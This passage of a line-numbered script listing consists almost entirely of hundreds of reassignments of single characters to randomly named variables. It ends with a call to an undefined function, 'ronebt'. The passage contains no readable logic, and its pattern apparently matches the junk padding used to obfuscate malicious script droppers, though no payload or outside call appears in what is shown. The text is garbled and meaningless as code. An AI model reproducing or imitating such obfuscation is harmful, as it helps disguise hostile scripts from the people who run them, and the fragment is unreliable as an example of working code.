793 | sxpjf = "o"; | |
794 | sxpjf = "B"; | |
795 | sxpjf = "Y"; | |
796 | sxpjf = "e"; | |
797 | sxpjf = "f"; | |
798 | sxpjf = "w"; | |
799 | sxpjf = "U"; | |
800 | sxpjf = "h"; | |
801 | sxpjf = "O"; | |
802 | sxpjf = "I"; | |
803 | sxpjf = "m"; | |
804 | sxpjf = "t"; | |
805 | sxpjf = "c"; | |
806 | sxpjf = "@"; | |
807 | zxmabzh = "M"; | |
808 | zxmabzh = "f"; | |
809 | zxmabzh = "M"; | |
810 | zxmabzh = "T"; | |
811 | zxmabzh = "b"; | |
812 | zxmabzh = "M"; | |
813 | zxmabzh = "r"; | |
814 | zxmabzh = "n"; | |
815 | zxmabzh = "o"; | |
816 | zxmabzh = "E"; | |
817 | zxmabzh = "0"; | |
818 | meenlr = "H"; | |
819 | meenlr = "f"; | |
820 | meenlr = "t"; | |
821 | meenlr = "e"; | |
822 | meenlr = "v"; | |
823 | meenlr = "O"; | |
824 | meenlr = "u"; | |
825 | meenlr = "E"; | |
826 | meenlr = "S"; | |
827 | meenlr = "E"; | |
828 | meenlr = "G"; | |
829 | meenlr = "M"; | |
830 | meenlr = "u"; | |
831 | meenlr = "m"; | |
832 | meenlr = "H"; | |
833 | meenlr = "a"; | |
834 | meenlr = "n"; | |
835 | meenlr = "N"; | |
836 | meenlr = "i"; | |
837 | meenlr = "p"; | |
838 | meenlr = "B"; | |
839 | meenlr = "W"; | |
840 | meenlr = "y"; | |
841 | meenlr = "y"; | |
842 | meenlr = "l"; | |
843 | meenlr = "a"; | |
844 | meenlr = " "; | |
845 | ueyum = "I"; | |
846 | ueyum = "v"; | |
847 | ueyum = "B"; | |
848 | ueyum = "E"; | |
849 | ueyum = "B"; | |
850 | ueyum = "X"; | |
851 | ueyum = "C"; | |
852 | ueyum = "g"; | |
853 | ueyum = "o"; | |
854 | ueyum = "P"; | |
855 | ueyum = "i"; | |
856 | ueyum = "R"; | |
857 | ooymi = "d"; | |
858 | ooymi = "Y"; | |
859 | ooymi = "T"; | |
860 | ooymi = "D"; | |
861 | ooymi = "A"; | |
862 | ooymi = "s"; | |
863 | ooymi = "z"; | |
864 | ooymi = "u"; | |
865 | ooymi = "x"; | |
866 | ooymi = "D"; | |
867 | ooymi = "p"; | |
868 | ooymi = "g"; | |
869 | ooymi = "C"; | |
870 | ooymi = "H"; | |
871 | ooymi = "G"; | |
872 | ooymi = "q"; | |
873 | ooymi = "c"; | |
874 | ooymi = "Q"; | |
875 | ooymi = "c"; | |
876 | ooymi = "r"; | |
877 | ooymi = "I"; | |
878 | ooymi = "Q"; | |
879 | ooymi = "/"; | |
880 | elcfwr = "Q"; | |
881 | rbkvsq = "j"; | |
882 | rbkvsq = "b"; | |
883 | rbkvsq = "b"; | |
884 | rbkvsq = "U"; | |
885 | rbkvsq = "L"; | |
886 | rbkvsq = "d"; | |
887 | rbkvsq = "u"; | |
888 | rbkvsq = "J"; | |
889 | rbkvsq = "E"; | |
890 | rbkvsq = "O"; | |
891 | rbkvsq = "p"; | |
892 | rbkvsq = "w"; | |
893 | rbkvsq = "l"; | |
894 | rbkvsq = "r"; | |
895 | rbkvsq = "a"; | |
896 | rbkvsq = "j"; | |
897 | rbkvsq = "H"; | |
898 | rbkvsq = "W"; | |
899 | rbkvsq = "f"; | |
900 | rbkvsq = "R"; | |
901 | rbkvsq = "c"; | |
902 | rbkvsq = "J"; | |
903 | rbkvsq = "Y"; | |
904 | rbkvsq = "c"; | |
905 | rbkvsq = "x"; | |
906 | rbkvsq = "j"; | |
907 | rbkvsq = "L"; | |
908 | rbkvsq = "A"; | |
909 | rbkvsq = "D"; | |
910 | rbkvsq = "T"; | |
911 | rbkvsq = "V"; | |
912 | rbkvsq = "E"; | |
913 | rbkvsq = "Y"; | |
914 | rbkvsq = "I"; | |
915 | rbkvsq = "D"; | |
916 | rbkvsq = "e"; | |
917 | zaoqidyt = "x"; | |
918 | zaoqidyt = "X"; | |
919 | zaoqidyt = "f"; | |
920 | zaoqidyt = "x"; | |
921 | zaoqidyt = "O"; | |
922 | zaoqidyt = "x"; | |
923 | zaoqidyt = "K"; | |
924 | zaoqidyt = "h"; | |
925 | zaoqidyt = "U"; | |
926 | zaoqidyt = "N"; | |
927 | zaoqidyt = "F"; | |
928 | zaoqidyt = "c"; | |
929 | zaoqidyt = "e"; | |
930 | zaoqidyt = "g"; | |
931 | zaoqidyt = "R"; | |
932 | zaoqidyt = "L"; | |
933 | zaoqidyt = "I"; | |
934 | zaoqidyt = "o"; | |
935 | zaoqidyt = "C"; | |
936 | zaoqidyt = "n"; | |
937 | zaoqidyt = "S"; | |
938 | zaoqidyt = "Z"; | |
939 | zaoqidyt = "A"; | |
940 | zaoqidyt = "O"; | |
941 | zaoqidyt = "E"; | |
942 | zaoqidyt = "t"; | |
943 | zaoqidyt = "i"; | |
944 | zaoqidyt = "i"; | |
945 | zaoqidyt = "o"; | |
946 | zaoqidyt = "m"; | |
947 | zaoqidyt = "Z"; | |
948 | zaoqidyt = "f"; | |
949 | zaoqidyt = "p"; | |
950 | zaoqidyt = "w"; | |
951 | zaoqidyt = "p"; | |
952 | zaoqidyt = "N"; | |
953 | zaoqidyt = "L"; | |
954 | zaoqidyt = "I"; | |
955 | zaoqidyt = "V"; | |
956 | zaoqidyt = "s"; | |
957 | zaoqidyt = "a"; | |
958 | zaoqidyt = "f"; | |
959 | zaoqidyt = "h"; | |
960 | zaoqidyt = "T"; | |
961 | zaoqidyt = "d"; | |
962 | sxvtwkj = "i"; | |
963 | sxvtwkj = "l"; | |
964 | sxvtwkj = "x"; | |
965 | sxvtwkj = "S"; | |
966 | sxvtwkj = "E"; | |
967 | sxvtwkj = "Z"; | |
968 | sxvtwkj = "A"; | |
969 | sxvtwkj = "x"; | |
970 | sxvtwkj = "t"; | |
971 | sxvtwkj = "c"; | |
972 | sxvtwkj = "k"; | |
973 | sxvtwkj = "I"; | |
974 | sxvtwkj = "A"; | |
975 | sxvtwkj = "i"; | |
976 | sxvtwkj = "u"; | |
977 | sxvtwkj = "i"; | |
978 | sxvtwkj = "q"; | |
979 | jtwknri = "m"; | |
980 | jtwknri = "A"; | |
981 | jtwknri = "m"; | |
982 | jtwknri = "U"; | |
983 | jtwknri = "Y"; | |
984 | jtwknri = "S"; | |
985 | jtwknri = "U"; | |
986 | jtwknri = "h"; | |
987 | jtwknri = "W"; | |
988 | iefnk = "V"; | |
989 | iefnk = "s"; | |
990 | iefnk = "a"; | |
991 | iefnk = "x"; | |
992 | iefnk = "m"; | |
993 | iefnk = "I"; | |
994 | iefnk = "P"; | |
995 | iefnk = "n"; | |
996 | iefnk = "p"; | |
997 | iefnk = "j"; | |
998 | iefnk = "l"; | |
999 | iefnk = "d"; | |
1000 | iefnk = "B"; | |
1001 | iefnk = "s"; | |
1002 | iefnk = "v"; | |
1003 | iefnk = "b"; | |
1004 | iefnk = "V"; | |
1005 | iefnk = "p"; | |
1006 | iefnk = "f"; | |
1007 | iefnk = "b"; | |
1008 | iefnk = "y"; | |
1009 | iefnk = "h"; | |
1010 | iefnk = "r"; | |
1011 | iefnk = "Q"; | |
1012 | iefnk = "q"; | |
1013 | iefnk = "b"; | |
1014 | iefnk = "U"; | |
1015 | iefnk = "a"; | |
1016 | iefnk = "t"; | |
1017 | iefnk = "J"; | |
1018 | iefnk = "w"; | |
1019 | iefnk = "b"; | |
1020 | iefnk = "b"; | |
1021 | iefnk = "X"; | |
1022 | iefnk = "X"; | |
1023 | iefnk = "Y"; | |
1024 | iefnk = "P"; | |
1025 | iefnk = "Y"; | |
1026 | iefnk = "M"; | |
1027 | iefnk = "p"; | |
1028 | iefnk = "Z"; | |
1029 | iefnk = "f"; | |
1030 | iefnk = "K"; | |
1031 | iefnk = "f"; | |
1032 | iefnk = "j"; | |
1033 | ziqhjpke = "a"; | |
1034 | ziqhjpke = "H"; | |
1035 | ziqhjpke = "N"; | |
1036 | ziqhjpke = "Y"; | |
1037 | ziqhjpke = "X"; | |
1038 | ziqhjpke = "H"; | |
1039 | zgjprt = "K"; | |
1040 | zgjprt = "w"; | |
1041 | zgjprt = "X"; | |
1042 | zgjprt = "K"; | |
1043 | zgjprt = "c"; | |
1044 | zgjprt = "S"; | |
1045 | zgjprt = "1"; | |
1046 | mctwdhx = "Z"; | |
1047 | mctwdhx = "R"; | |
1048 | mctwdhx = "c"; | |
1049 | mctwdhx = "p"; | |
1050 | mctwdhx = "h"; | |
1051 | mctwdhx = "b"; | |
1052 | mctwdhx = "l"; | |
1053 | mctwdhx = "c"; | |
1054 | mctwdhx = "P"; | |
1055 | mctwdhx = "r"; | |
1056 | mctwdhx = "d"; | |
1057 | mctwdhx = "M"; | |
1058 | mctwdhx = "u"; | |
1059 | mctwdhx = "X"; | |
1060 | mctwdhx = "I"; | |
1061 | mctwdhx = "t"; | |
1062 | mctwdhx = "B"; | |
1063 | mctwdhx = "Q"; | |
1064 | mctwdhx = "e"; | |
1065 | mctwdhx = "r"; | |
1066 | mctwdhx = "q"; | |
1067 | mctwdhx = "V"; | |
1068 | mctwdhx = "O"; | |
1069 | mctwdhx = "a"; | |
1070 | mctwdhx = "G"; | |
1071 | mctwdhx = "g"; | |
1072 | mctwdhx = "X"; | |
1073 | mctwdhx = "s"; | |
1074 | mctwdhx = "N"; | |
1075 | mctwdhx = "p"; | |
1076 | mctwdhx = "K"; | |
1077 | mctwdhx = "z"; | |
1078 | mctwdhx = "f"; | |
1079 | mctwdhx = "J"; | |
1080 | mctwdhx = "R"; | |
1081 | mctwdhx = "G"; | |
1082 | mctwdhx = "W"; | |
1083 | mctwdhx = "m"; | |
1084 | mctwdhx = "x"; | |
1085 | mctwdhx = "i"; | |
1086 | mctwdhx = "8"; | |
1087 | ndiimmiq = "J"; | |
1088 | ndiimmiq = "q"; | |
1089 | ndiimmiq = "o"; | |
1090 | ndiimmiq = "H"; | |
1091 | ndiimmiq = "U"; | |
1092 | ndiimmiq = "g"; | |
1093 | ndiimmiq = "T"; | |
1094 | ndiimmiq = "W"; | |
1095 | ndiimmiq = "o"; | |
1096 | ndiimmiq = "D"; | |
1097 | ndiimmiq = "Q"; | |
1098 | ndiimmiq = "n"; | |
1099 | ndiimmiq = "m"; | |
1100 | ndiimmiq = "p"; | |
1101 | ndiimmiq = "E"; | |
1102 | ndiimmiq = "u"; | |
1103 | ndiimmiq = "c"; | |
1104 | ndiimmiq = "F"; | |
1105 | ndiimmiq = "S"; | |
1106 | ndiimmiq = "A"; | |
1107 | ndiimmiq = "P"; | |
1108 | ndiimmiq = "P"; | |
1109 | ndiimmiq = "t"; | |
1110 | uiikvihlq = "e"; | |
1111 | uiikvihlq = "f"; | |
1112 | uiikvihlq = "A"; | |
1113 | uiikvihlq = "q"; | |
1114 | uiikvihlq = "r"; | |
1115 | uiikvihlq = "Y"; | |
1116 | uiikvihlq = "N"; | |
1117 | uiikvihlq = "y"; | |
1118 | uiikvihlq = "X"; | |
1119 | uiikvihlq = "w"; | |
1120 | uiikvihlq = "a"; | |
1121 | uiikvihlq = "O"; | |
1122 | uiikvihlq = "r"; | |
1123 | uiikvihlq = "V"; | |
1124 | uiikvihlq = "O"; | |
1125 | uiikvihlq = "n"; | |
1126 | uiikvihlq = "p"; | |
1127 | uiikvihlq = "B"; | |
1128 | uiikvihlq = "y"; | |
1129 | uiikvihlq = "W"; | |
1130 | uiikvihlq = "j"; | |
1131 | uiikvihlq = "p"; | |
1132 | uiikvihlq = "x"; | |
1133 | uiikvihlq = "T"; | |
1134 | uiikvihlq = "v"; | |
1135 | uiikvihlq = "S"; | |
1136 | uiikvihlq = "I"; | |
1137 | uiikvihlq = "S"; | |
1138 | uiikvihlq = "k"; | |
1139 | uiikvihlq = "s"; | |
1140 | uiikvihlq = "p"; | |
1141 | uiikvihlq = "y"; | |
1142 | uiikvihlq = "Q"; | |
1143 | uiikvihlq = "v"; | |
1144 | lscayqll = "x"; | |
1145 | lscayqll = "x"; | |
1146 | lscayqll = "N"; | |
1147 | lscayqll = "n"; | |
1148 | lscayqll = "S"; | |
1149 | lscayqll = "."; | |
1150 | rnpgvay = "n"; | |
1151 | rnpgvay = "W"; | |
1152 | rnpgvay = "l"; | |
1153 | rnpgvay = "F"; | |
1154 | rnpgvay = "b"; | |
1155 | rnpgvay = "q"; | |
1156 | rnpgvay = "B"; | |
1157 | rnpgvay = "Z"; | |
1158 | rnpgvay = "n"; | |
1159 | rnpgvay = "D"; | |
1160 | rnpgvay = "j"; | |
1161 | rnpgvay = "e"; | |
1162 | rnpgvay = "A"; | |
1163 | rnpgvay = "U"; | |
1164 | rnpgvay = "T"; | |
1165 | rnpgvay = "v"; | |
1166 | rnpgvay = "R"; | |
1167 | rnpgvay = "G"; | |
1168 | rnpgvay = "v"; | |
1169 | rnpgvay = "s"; | |
1170 | rnpgvay = "Y"; | |
1171 | rnpgvay = "O"; | |
1172 | rnpgvay = "q"; | |
1173 | rnpgvay = "U"; | |
1174 | rnpgvay = "G"; | |
1175 | rnpgvay = "h"; | |
1176 | rnpgvay = "q"; | |
1177 | rnpgvay = "U"; | |
1178 | rnpgvay = "I"; | |
1179 | rnpgvay = "L"; | |
1180 | rnpgvay = "g"; | |
1181 | rnpgvay = "z"; | |
1182 | rnpgvay = "E"; | |
1183 | rnpgvay = "u"; | |
1184 | rnpgvay = "j"; | |
1185 | rnpgvay = "B"; | |
1186 | rnpgvay = "n"; | |
1187 | rnpgvay = "T"; | |
1188 | rnpgvay = "p"; | |
1189 | dgweca = "k"; | |
1190 | ijjlh = "l"; | |
1191 | ijjlh = "t"; | |
1192 | ijjlh = "a"; | |
1193 | ijjlh = "U"; | |
1194 | ijjlh = "Q"; | |
1195 | ijjlh = "C"; | |
1196 | ijjlh = "d"; | |
1197 | ijjlh = "P"; | |
1198 | ijjlh = "h"; | |
1199 | ijjlh = "i"; | |
1200 | ijjlh = "o"; | |
1201 | ijjlh = "H"; | |
1202 | ijjlh = "O"; | |
1203 | hdjlp = "a"; | |
1204 | monasatrz = "d"; | |
1205 | monasatrz = "e"; | |
1206 | monasatrz = "i"; | |
1207 | monasatrz = "C"; | |
1208 | monasatrz = "C"; | |
1209 | monasatrz = "n"; | |
1210 | monasatrz = "O"; | |
1211 | monasatrz = "m"; | |
1212 | monasatrz = "o"; | |
1213 | monasatrz = "k"; | |
1214 | monasatrz = "V"; | |
1215 | monasatrz = "z"; | |
1216 | monasatrz = "h"; | |
1217 | monasatrz = "I"; | |
1218 | monasatrz = "A"; | |
1219 | monasatrz = "J"; | |
1220 | monasatrz = "j"; | |
1221 | monasatrz = "g"; | |
1222 | monasatrz = "r"; | |
1223 | monasatrz = "Q"; | |
1224 | monasatrz = "s"; | |
1225 | monasatrz = "A"; | |
1226 | monasatrz = "f"; | |
1227 | monasatrz = "j"; | |
1228 | monasatrz = "z"; | |
1229 | monasatrz = "W"; | |
1230 | monasatrz = "Q"; | |
1231 | monasatrz = "o"; | |
1232 | monasatrz = "N"; | |
1233 | monasatrz = "p"; | |
1234 | monasatrz = "n"; | |
1235 | monasatrz = "I"; | |
1236 | monasatrz = "D"; | |
1237 | monasatrz = "h"; | |
1238 | monasatrz = "m"; | |
1239 | iifnqus = "b"; | |
1240 | iifnqus = "w"; | |
1241 | iifnqus = "k"; | |
1242 | iifnqus = "O"; | |
1243 | iifnqus = "J"; | |
1244 | iifnqus = "G"; | |
1245 | iifnqus = "p"; | |
1246 | iifnqus = "j"; | |
1247 | iifnqus = "W"; | |
1248 | iifnqus = "c"; | |
1249 | iifnqus = "A"; | |
1250 | iifnqus = "D"; | |
1251 | iifnqus = "J"; | |
1252 | iifnqus = "n"; | |
1253 | iifnqus = "m"; | |
1254 | iifnqus = "v"; | |
1255 | iifnqus = "t"; | |
1256 | iifnqus = "D"; | |
1257 | iifnqus = "j"; | |
1258 | iifnqus = "I"; | |
1259 | iifnqus = "Z"; | |
1260 | iifnqus = "Z"; | |
1261 | iifnqus = "C"; | |
1262 | iifnqus = "m"; | |
1263 | iifnqus = "R"; | |
1264 | iifnqus = "B"; | |
1265 | iifnqus = "A"; | |
1266 | iifnqus = "j"; | |
1267 | iifnqus = "i"; | |
1268 | iifnqus = "w"; | |
1269 | iifnqus = "r"; | |
1270 | iifnqus = "l"; | |
1271 | ndtiq = "Q"; | |
1272 | ndtiq = "k"; | |
1273 | ndtiq = "q"; | |
1274 | ndtiq = "E"; | |
1275 | ndtiq = "h"; | |
1276 | ndtiq = "N"; | |
1277 | ndtiq = "x"; | |
1278 | ndtiq = "n"; | |
1279 | ndtiq = "s"; | |
1280 | ndtiq = "J"; | |
1281 | ndtiq = "n"; | |
1282 | ndtiq = "E"; | |
1283 | ndtiq = "u"; | |
1284 | ndtiq = "O"; | |
1285 | ndtiq = "p"; | |
1286 | ndtiq = "w"; | |
1287 | ndtiq = "a"; | |
1288 | ndtiq = "G"; | |
1289 | ndtiq = "O"; | |
1290 | ndtiq = "J"; | |
1291 | ndtiq = "P"; | |
1292 | ndtiq = "u"; | |
1293 | ndtiq = "Y"; | |
1294 | ndtiq = "p"; | |
1295 | ndtiq = "S"; | |
1296 | ndtiq = "C"; | |
1297 | ndtiq = "p"; | |
1298 | ndtiq = "h"; | |
1299 | ndtiq = "W"; | |
1300 | ndtiq = "J"; | |
1301 | ndtiq = "c"; | |
1302 | ndtiq = "y"; | |
1303 | ndtiq = "A"; | |
1304 | ndtiq = "l"; | |
1305 | ndtiq = "U"; | |
1306 | ndtiq = "O"; | |
1307 | ndtiq = "4"; | |
1308 | lnhzyofo = "n"; | |
1309 | lnhzyofo = "o"; | |
1310 | lnhzyofo = "q"; | |
1311 | lnhzyofo = "Q"; | |
1312 | lnhzyofo = "j"; | |
1313 | lnhzyofo = "O"; | |
1314 | lnhzyofo = "\\"; | |
1315 | kpuirdi = "i"; | |
1316 | kpuirdi = "R"; | |
1317 | kpuirdi = "M"; | |
1318 | kpuirdi = "s"; | |
1319 | kpuirdi = "F"; | |
1320 | kpuirdi = "D"; | |
1321 | kpuirdi = "m"; | |
1322 | kpuirdi = "e"; | |
1323 | kpuirdi = "B"; | |
1324 | kpuirdi = "N"; | |
1325 | kpuirdi = "w"; | |
1326 | kpuirdi = "X"; | |
1327 | kpuirdi = "J"; | |
1328 | kpuirdi = "D"; | |
1329 | kpuirdi = "s"; | |
1330 | kpuirdi = "e"; | |
1331 | kpuirdi = "w"; | |
1332 | kpuirdi = "p"; | |
1333 | kpuirdi = "B"; | |
1334 | kpuirdi = "s"; | |
1335 | kpuirdi = "Y"; | |
1336 | kpuirdi = "b"; | |
1337 | kpuirdi = "O"; | |
1338 | kpuirdi = ":"; | |
1339 | ypzvpb = "Y"; | |
1340 | ypzvpb = "D"; | |
1341 | ypzvpb = "e"; | |
1342 | ypzvpb = "B"; | |
1343 | ypzvpb = "v"; | |
1344 | ypzvpb = "N"; | |
1345 | ypzvpb = "Y"; | |
1346 | ypzvpb = "L"; | |
1347 | ypzvpb = "t"; | |
1348 | ypzvpb = "b"; | |
1349 | ypzvpb = "o"; | |
1350 | ypzvpb = "D"; | |
1351 | ypzvpb = "K"; | |
1352 | ypzvpb = "n"; | |
1353 | ypzvpb = "d"; | |
1354 | ypzvpb = "D"; | |
1355 | ypzvpb = "H"; | |
1356 | ypzvpb = "i"; | |
1357 | ltxwwkw = "G"; | |
1358 | ltxwwkw = "q"; | |
1359 | ltxwwkw = "t"; | |
1360 | ltxwwkw = "y"; | |
1361 | ltxwwkw = "d"; | |
1362 | ltxwwkw = "t"; | |
1363 | ltxwwkw = "O"; | |
1364 | ltxwwkw = "D"; | |
1365 | ltxwwkw = "a"; | |
1366 | ltxwwkw = "I"; | |
1367 | ltxwwkw = "k"; | |
1368 | ltxwwkw = "I"; | |
1369 | ltxwwkw = "l"; | |
1370 | ltxwwkw = "m"; | |
1371 | ltxwwkw = "a"; | |
1372 | ltxwwkw = "s"; | |
1373 | ltxwwkw = "V"; | |
1374 | ltxwwkw = "Y"; | |
1375 | ltxwwkw = "-"; | |
1376 | vrlvd = "f"; | |
1377 | vrlvd = "o"; | |
1378 | vrlvd = "B"; | |
1379 | vrlvd = "Y"; | |
1380 | vrlvd = "Y"; | |
1381 | vrlvd = "H"; | |
1382 | vrlvd = "v"; | |
1383 | vrlvd = "E"; | |
1384 | vrlvd = "v"; | |
1385 | vrlvd = "j"; | |
1386 | vrlvd = "B"; | |
1387 | vrlvd = "s"; | |
1388 | vrlvd = "A"; | |
1389 | vrlvd = "j"; | |
1390 | vrlvd = "u"; | |
1391 | vrlvd = "O"; | |
1392 | vrlvd = "S"; | |
1393 | vrlvd = "e"; | |
1394 | vrlvd = "T"; | |
1395 | vrlvd = "X"; | |
1396 | vrlvd = "U"; | |
1397 | vrlvd = "\""; | |
1398 | zntfoq = "w"; | |
1399 | zntfoq = "l"; | |
1400 | zntfoq = "Z"; | |
1401 | zntfoq = "m"; | |
1402 | zntfoq = "Q"; | |
1403 | zntfoq = "i"; | |
1404 | zntfoq = "z"; | |
1405 | zntfoq = "b"; | |
1406 | zntfoq = "l"; | |
1407 | zntfoq = "r"; | |
1408 | zntfoq = "B"; | |
1409 | zntfoq = "O"; | |
1410 | zntfoq = "s"; | |
1411 | zntfoq = "q"; | |
1412 | zntfoq = "N"; | |
1413 | zntfoq = "T"; | |
1414 | zntfoq = "H"; | |
1415 | zntfoq = "L"; | |
1416 | zntfoq = "p"; | |
1417 | zntfoq = "B"; | |
1418 | zntfoq = "M"; | |
1419 | zntfoq = "F"; | |
1420 | zntfoq = "d"; | |
1421 | zntfoq = "p"; | |
1422 | zntfoq = "y"; | |
1423 | zntfoq = "k"; | |
1424 | zntfoq = "L"; | |
1425 | zntfoq = "S"; | |
1426 | zntfoq = "T"; | |
1427 | zntfoq = "T"; | |
1428 | mltoaixa = "u"; | |
1429 | mltoaixa = "K"; | |
1430 | mltoaixa = "t"; | |
1431 | mltoaixa = "V"; | |
1432 | mltoaixa = "G"; | |
1433 | mltoaixa = "y"; | |
1434 | mltoaixa = "I"; | |
1435 | mltoaixa = "S"; | |
1436 | mltoaixa = "T"; | |
1437 | mltoaixa = "r"; | |
1438 | mltoaixa = "A"; | |
1439 | mltoaixa = "h"; | |
1440 | mqtvq = "r"; | |
1441 | mqtvq = "N"; | |
1442 | mqtvq = "Z"; | |
1443 | mqtvq = "f"; | |
1444 | mqtvq = "v"; | |
1445 | mqtvq = "F"; | |
1446 | mqtvq = "g"; | |
1447 | mqtvq = "N"; | |
1448 | mqtvq = "v"; | |
1449 | mqtvq = "D"; | |
1450 | mqtvq = "s"; | |
1451 | mqtvq = "A"; | |
1452 | mqtvq = "q"; | |
1453 | mqtvq = "B"; | |
1454 | mqtvq = "T"; | |
1455 | mqtvq = "b"; | |
1456 | mqtvq = "a"; | |
1457 | mqtvq = "q"; | |
1458 | mqtvq = "P"; | |
1459 | mqtvq = "c"; | |
1460 | mqtvq = "w"; | |
1461 | mqtvq = "k"; | |
1462 | mqtvq = "u"; | |
1463 | mqtvq = "Z"; | |
1464 | mqtvq = "u"; | |
1465 | mqtvq = "y"; | |
1466 | mqtvq = "c"; | |
1467 | mqtvq = "g"; | |
1468 | mqtvq = "m"; | |
1469 | mqtvq = "d"; | |
1470 | mqtvq = "e"; | |
1471 | mqtvq = "U"; | |
1472 | mqtvq = "D"; | |
1473 | mqtvq = "h"; | |
1474 | mqtvq = "e"; | |
1475 | mqtvq = "n"; | |
1476 | mqtvq = "S"; | |
1477 | mqtvq = "f"; | |
1478 | mqtvq = "r"; | |
1479 | mqtvq = "G"; | |
1480 | mqtvq = "n"; | |
1481 | mqtvq = "E"; | |
1482 | mqtvq = "L"; | |
1483 | mqtvq = "p"; | |
1484 | mqtvq = "x"; | |
1485 | ronebt ( ); |
|